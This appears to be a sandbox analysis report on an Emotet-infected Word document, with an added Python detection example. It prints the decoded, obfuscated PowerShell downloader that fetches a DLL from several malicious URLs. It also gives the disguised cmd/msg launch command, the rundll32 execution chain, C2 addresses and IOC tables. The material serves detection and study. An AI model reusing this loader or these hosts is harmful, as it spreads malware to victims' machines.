                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00781D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_003C12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_004312C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001B12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00761D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_001F12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_00171D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_002712C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 217.160.169.110 144
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 51.255.203.164 144
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 84.232.229.24 80
                      Encrypted powershell cmdline option found
                      Source: unknown | Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
                      Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: Yara match | File source: 0000000B.00000002.2116581505.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.2113422714.00000000003F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.2113576039.0000000000780000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.2108915228.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.2120708575.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.2120498924.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.2109055699.0000000000710000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000D.00000002.2124089879.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.2350246723.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2111700747.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.2108942082.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.2126847598.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.2125021450.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.2113404333.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.2350021887.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000D.00000002.2124035115.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000D.00000002.2124200175.0000000000760000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.2126913357.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.2107162967.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.2116039169.0000000000170000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.2125095238.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.2120569228.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2111875145.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.2127036397.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2112057590.0000000000340000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.2124826552.0000000000170000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.2349984443.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.2116715619.0000000000430000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.2106916506.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.2106771774.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 8.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.260000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.rundll32.exe.7d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.rundll32.exe.780000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.710000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.rundll32.exe.3f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 12.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.rundll32.exe.780000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.rundll32.exe.760000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.rundll32.exe.7d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 12.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.260000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.rundll32.exe.3f0000.0.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

Bracketed digits are the signature counters attached to a cell in the original matrix; cells without digits are the matrix background and were not triggered by this sample.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation [11] | Path Interception | Process Injection [111] | Masquerading [21] | OS Credential Dumping | Security Software Discovery [11] | Remote Services | Archive Collected Data [1] | Exfiltration Over Other Network Medium | Encrypted Channel [1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Command and Scripting Interpreter [211] | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion [2] | LSASS Memory | Virtualization/Sandbox Evasion [2] | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port [1] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Scripting [12] | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools [11] | Security Account Manager | Process Discovery [1] | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer [12] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution [3] | Logon Script (Mac) | Logon Script (Mac) | Process Injection [111] | NTDS | Remote System Discovery [1] | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol [3] | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | PowerShell [3] | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information [3] | LSA Secrets | File and Directory Discovery [2] | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol [23] | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting [12] | Cached Domain Credentials | System Information Discovery [15] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Hidden Files and Directories [1] | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information [1] | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll32 [1] | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph

Behavior Graph ID: 344339; Sample: Arch_2021_717-1562532.doc; Start date: 26/01/2021; Architecture: WINDOWS; Score: 100

The graph itself is an image that did not survive extraction. The process tree it encodes is reproduced below; the two numbers after WINWORD.EXE and powershell.exe are the graph's created-registry-value and created-file counters, a single number after a rundll32.exe instance is the counter shown beside that node.

Sample root (signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 12 other signatures)
• WINWORD.EXE (293, 26) started
• cmd.exe started (signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found)
  • msg.exe started
  • powershell.exe (12, 9) started
    • DNS/IP: shannared.com 192.169.223.13, TCP 49167 -> 80, AS-26496-GO-DADDY-COM-LLCUS, United States
    • dropped: C:\Users\user\Kaktksw\An6othh4549I.dll, PE32 (the Dropped Files table below lists the same file as C:\Users\user\Kaktksw\An6othh\N49I.dll); signature: Powershell drops PE file
    • rundll32.exe started
      • rundll32.exe started
        • rundll32.exe (2) started; signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
          • rundll32.exe started
            • rundll32.exe (1) started; signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
              • rundll32.exe started
                • rundll32.exe (1) started; signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                  • rundll32.exe started
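The chain above (a shell that the report attributes to WMI process creation, a very long encoded PowerShell command line, rundll32.exe started by PowerShell with an ordinal export per the "Suspicious Call by Ordinal" Sigma hit, and rundll32.exe re-launching itself several levels deep) is what a detection engineer would want to recognise in endpoint telemetry. The following is an added example, not code from the report or from Joe Sandbox: it runs a few rules over constructed Sysmon-style process-creation events. Only PID 2564 is taken from the report (it is the powershell.exe PID named in the warnings); every other PID, every command line, the ",#1" export and the reuse of the dropped-DLL path for the whole rundll32 chain are assumptions made for the example.

```python
"""Flag the Emotet-style execution chain documented in this report in
process-creation telemetry (Sysmon Event ID 1 or equivalent)."""
import re

# Constructed events (pid, ppid, image, command line). PID 2564 is the
# powershell.exe PID from the report; everything else is made up here. The
# ",#1" ordinal export is an assumption consistent with the report's
# "Suspicious Call by Ordinal" signature, and the same DLL path is reused for
# the self-relaunch chain because the real re-launch path is not on the page.
DLL = r"C:\Users\user\Kaktksw\An6othh\N49I.dll"
ENC = "powershell -w hidden -enc " + "QQBB" * 300   # long base64 blob stand-in
RUNDLL = r"C:\Windows\System32\rundll32.exe"
EVENTS = [
    {"pid": 2000, "ppid": 800,  "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmdline": "WmiPrvSE.exe"},
    {"pid": 2100, "ppid": 2000, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c " + ENC},
    {"pid": 2564, "ppid": 2100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": ENC},
    {"pid": 2600, "ppid": 2100, "image": r"C:\Windows\System32\msg.exe", "cmdline": "msg * placeholder"},
    {"pid": 2700, "ppid": 2564, "image": RUNDLL, "cmdline": "rundll32 %s,#1" % DLL},
    {"pid": 2710, "ppid": 2700, "image": RUNDLL, "cmdline": "rundll32 %s,#1" % DLL},
    {"pid": 2720, "ppid": 2710, "image": RUNDLL, "cmdline": "rundll32 %s,#1" % DLL},
    {"pid": 2730, "ppid": 2720, "image": RUNDLL, "cmdline": "rundll32 %s,#1" % DLL},
    # Benign control: a Control Panel applet launched from Explorer.
    {"pid": 3000, "ppid": 900,  "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 3010, "ppid": 3000, "image": RUNDLL, "cmdline": "rundll32 shell32.dll,Control_RunDLL"},
]

# -e, -ec, -enc ... -EncodedCommand, case-insensitive, with - or / prefix.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|enco|encod|encode|encoded|encodedcommand)(?:\s|$)")
ORDINAL_EXPORT = re.compile(r",\s*#\d+\b")   # "x.dll,#1" style export-by-ordinal


def _base(image):
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def rundll32_depth(pid, by_pid):
    """Count consecutive rundll32.exe processes from pid up through its parents."""
    depth, seen = 0, set()
    while pid in by_pid and pid not in seen and _base(by_pid[pid]["image"]) == "rundll32.exe":
        seen.add(pid)
        depth += 1
        pid = by_pid[pid]["ppid"]
    return depth


def find_emotet_chain(events, long_cmdline=1000, chain_depth=3):
    """Return (rule, pid) findings for every event that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = _base(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = _base(parent["image"]) if parent else ""
        if name == "cmd.exe" and pname == "wmiprvse.exe":
            findings.append(("cmd_spawned_by_wmi", e["pid"]))
        if name == "powershell.exe" and ENC_FLAG.search(e["cmdline"]) and len(e["cmdline"]) >= long_cmdline:
            findings.append(("long_encoded_powershell", e["pid"]))
        if name == "rundll32.exe":
            if pname == "powershell.exe":
                findings.append(("rundll32_from_powershell", e["pid"]))
            if ORDINAL_EXPORT.search(e["cmdline"]):
                findings.append(("rundll32_ordinal_export", e["pid"]))
            if rundll32_depth(e["pid"], by_pid) >= chain_depth:
                findings.append(("rundll32_self_relaunch_chain", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in find_emotet_chain(EVENTS):
        print("%-30s pid=%d" % (rule, pid))
```

The benign Control Panel launch (PID 3010) produces no finding: it is a single rundll32.exe with a named export under explorer.exe. Tune `long_cmdline` and `chain_depth` to your estate; the report's own evidence is a chain eight rundll32.exe instances long.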


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
Arch_2021_717-1562532.doc | 16% | Virustotal |
Arch_2021_717-1562532.doc | 27% | ReversingLabs | Document-Word.Trojan.GenScript

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\Kaktksw\An6othh\N49I.dll | 100% | Joe Sandbox ML |
C:\Users\user\Kaktksw\An6othh\N49I.dll | 55% | ReversingLabs | Win32.Trojan.EmotetCrypt

                      Unpacked PE Files

Source | Detection | Scanner | Label
12.2.rundll32.exe.2c0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
13.2.rundll32.exe.220000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
15.2.rundll32.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
11.2.rundll32.exe.170000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
10.2.rundll32.exe.3f0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
10.2.rundll32.exe.780000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
13.2.rundll32.exe.760000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
16.2.rundll32.exe.7d0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
9.2.rundll32.exe.340000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
8.2.rundll32.exe.710000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
14.2.rundll32.exe.170000.0.unpack | 100% | Avira | HEUR/AGEN.1110387

                      Domains

Source | Detection | Scanner | Label
shannared.com | 5% | Virustotal |

                      URLs

Source | Detection | Scanner | Label
http://217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/ | 0% | Avira URL Cloud | safe
http://3musketeersent.net/wp-includes/TUgD/ | 100% | Avira URL Cloud | malware
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
https://skilmu.com/wp-admin/hQVlB8b/ | 0% | Avira URL Cloud | safe
http://jeevanlic.com/wp-content/r8M/ | 0% | Avira URL Cloud | safe
http://dashudance.com/thinkphp/dgs7Jm9/ | 100% | Avira URL Cloud | malware
http://shannared.com | 0% | Avira URL Cloud | safe
http://shannared.com/content/lhALeS/ | 100% | Avira URL Cloud | malware
http://www.%s.comPA | 0% | URL Reputation | safe
http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/ | 100% | Avira URL Cloud | malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://leopardcranes.com/zynq-linux-yaayf/w/ | 100% | Avira URL Cloud | malware

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
shannared.com | 192.169.223.13 | true | true | | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/ | true | Avira URL Cloud: safe | unknown
http://shannared.com/content/lhALeS/ | true | Avira URL Cloud: malware | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
